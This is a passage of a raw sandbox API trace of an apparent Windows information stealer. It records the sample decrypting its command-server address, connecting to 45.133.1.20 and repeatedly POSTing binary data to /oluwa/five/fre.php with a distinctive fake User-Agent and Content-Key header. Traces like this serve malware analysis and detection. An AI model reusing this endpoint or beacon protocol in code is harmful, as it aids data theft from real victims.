Size=0x1fdc) returned 0x6dc730 [0249.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0249.313] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0249.314] GetProcessHeap () returned 0x6a0000 [0249.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0249.314] GetProcessHeap () returned 0x6a0000 [0249.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0249.314] send (s=0x824, buf=0x6bd460*, len=242, flags=0) returned 242 [0249.315] send (s=0x824, buf=0x6bb998*, len=159, flags=0) returned 159 [0249.315] GetProcessHeap () returned 0x6a0000 [0249.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0249.315] recv (in: s=0x824, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0249.392] GetProcessHeap () returned 0x6a0000 [0249.392] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0249.393] GetProcessHeap () returned 0x6a0000 [0249.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0249.394] GetProcessHeap () returned 0x6a0000 [0249.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4738 | out: hHeap=0x6a0000) returned 1 [0249.395] GetProcessHeap () returned 0x6a0000 [0249.395] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0249.395] closesocket (s=0x824) returned 0 [0249.397] GetProcessHeap () returned 0x6a0000 [0249.397] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0249.397] GetProcessHeap () returned 0x6a0000 [0249.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0249.398] GetProcessHeap () returned 0x6a0000 [0249.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0249.398] GetProcessHeap () returned 0x6a0000 [0249.398] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0249.399] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1554) returned 0x824 [0249.401] Sleep (dwMilliseconds=0xea60) [0249.403] GetProcessHeap () returned 0x6a0000 [0249.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0249.404] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.405] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.421] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0249.430] GetProcessHeap () returned 0x6a0000 [0249.430] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0249.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.437] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0249.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.438] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.439] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.439] GetProcessHeap () returned 0x6a0000 [0249.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0249.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.442] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0249.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.443] CryptDestroyKey (hKey=0x6ad060) returned 1 [0249.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.444] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0249.444] GetProcessHeap () returned 0x6a0000 [0249.444] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0249.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.445] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0249.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.446] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0249.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.447] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0249.450] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.450] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0249.450] GetProcessHeap () returned 0x6a0000 [0249.450] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0249.450] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0249.451] GetProcessHeap () returned 0x6a0000 [0249.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0249.451] GetProcessHeap () returned 0x6a0000 [0249.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0249.452] GetProcessHeap () returned 0x6a0000 [0249.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0249.452] GetProcessHeap () returned 0x6a0000 [0249.452] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0249.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.454] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0249.481] GetProcessHeap () returned 0x6a0000 [0249.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0249.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.483] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0249.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.484] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.485] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.485] GetProcessHeap () returned 0x6a0000 [0249.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0249.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.491] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0249.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.492] CryptDestroyKey (hKey=0x6ad020) returned 1 [0249.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.493] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0249.493] GetProcessHeap () returned 0x6a0000 [0249.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0249.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.494] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0249.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.494] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0249.495] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.495] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0249.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.497] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0249.497] GetProcessHeap () returned 0x6a0000 [0249.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0249.497] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0249.497] GetProcessHeap () returned 0x6a0000 [0249.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0249.497] socket (af=2, type=1, protocol=6) returned 0x828 [0249.497] connect (s=0x828, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0249.518] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0249.518] GetProcessHeap () returned 0x6a0000 [0249.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0249.518] GetProcessHeap () returned 0x6a0000 [0249.518] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0249.519] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0249.520] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0249.520] GetProcessHeap () returned 0x6a0000 [0249.520] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c4bb8 [0249.520] GetProcessHeap () returned 0x6a0000 [0249.520] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0249.522] GetProcessHeap () returned 0x6a0000 [0249.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0249.522] GetProcessHeap () returned 0x6a0000 [0249.522] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0249.523] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0249.524] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0249.524] GetProcessHeap () returned 0x6a0000 [0249.524] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0249.524] GetProcessHeap () returned 0x6a0000 [0249.524] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0249.524] send (s=0x828, buf=0x6bd460*, len=242, flags=0) returned 242 [0249.525] send (s=0x828, buf=0x6bb998*, len=159, flags=0) returned 159 [0249.525] GetProcessHeap () returned 0x6a0000 [0249.525] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0249.526] recv (in: s=0x828, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0249.602] GetProcessHeap () returned 0x6a0000 [0249.602] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0249.602] GetProcessHeap () returned 0x6a0000 [0249.603] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0249.604] GetProcessHeap () returned 0x6a0000 [0249.604] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4bb8 | out: hHeap=0x6a0000) returned 1 [0249.605] GetProcessHeap () returned 0x6a0000 [0249.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0249.606] closesocket (s=0x828) returned 0 [0249.606] GetProcessHeap () returned 0x6a0000 [0249.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baaa0 | out: hHeap=0x6a0000) returned 1 [0249.607] GetProcessHeap () returned 0x6a0000 [0249.607] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0249.608] GetProcessHeap () returned 0x6a0000 [0249.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0249.611] GetProcessHeap () returned 0x6a0000 [0249.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0249.612] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1558) returned 0x828 [0249.614] Sleep (dwMilliseconds=0xea60) [0249.615] GetProcessHeap () returned 0x6a0000 [0249.615] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0249.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.617] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.625] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0249.632] GetProcessHeap () returned 0x6a0000 [0249.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0249.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.634] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0249.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.635] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.636] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.636] GetProcessHeap () returned 0x6a0000 [0249.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0249.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.639] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0249.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.640] CryptDestroyKey (hKey=0x6ad020) returned 1 [0249.641] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.644] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0249.644] GetProcessHeap () returned 0x6a0000 [0249.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0249.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.646] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0249.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.657] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0249.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.658] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0249.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.660] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0249.660] GetProcessHeap () returned 0x6a0000 [0249.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0249.660] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0249.661] GetProcessHeap () returned 0x6a0000 [0249.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0249.661] GetProcessHeap () returned 0x6a0000 [0249.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0249.662] GetProcessHeap () returned 0x6a0000 [0249.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0249.663] GetProcessHeap () returned 0x6a0000 [0249.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0249.667] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.668] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0249.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.675] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0249.682] GetProcessHeap () returned 0x6a0000 [0249.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0249.683] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.683] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0249.684] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.684] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0249.685] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.685] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0249.685] GetProcessHeap () returned 0x6a0000 [0249.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0249.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.689] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0249.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.690] CryptDestroyKey (hKey=0x6ad020) returned 1 [0249.691] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0249.691] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0249.691] GetProcessHeap () returned 0x6a0000 [0249.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0249.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.692] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0249.693] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.693] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0249.694] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.694] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0249.695] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0249.695] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0249.695] GetProcessHeap () returned 0x6a0000 [0249.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0249.696] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0249.696] GetProcessHeap () returned 0x6a0000 [0249.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baaa0 [0249.696] socket (af=2, type=1, protocol=6) returned 0x82c [0249.696] connect (s=0x82c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0249.722] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0249.723] GetProcessHeap () returned 0x6a0000 [0249.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0249.723] GetProcessHeap () returned 0x6a0000 [0249.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0249.724] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0249.725] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0249.725] GetProcessHeap () returned 0x6a0000 [0249.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5578 [0249.725] GetProcessHeap () returned 0x6a0000 [0249.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0249.725] GetProcessHeap () returned 0x6a0000 [0249.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0249.725] GetProcessHeap () returned 0x6a0000 [0249.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0249.726] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0249.727] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0249.727] GetProcessHeap () returned 0x6a0000 [0249.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0249.727] GetProcessHeap () returned 0x6a0000 [0249.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0249.728] send (s=0x82c, buf=0x6bd460*, len=242, flags=0) returned 242 [0249.729] send (s=0x82c, buf=0x6bb998*, 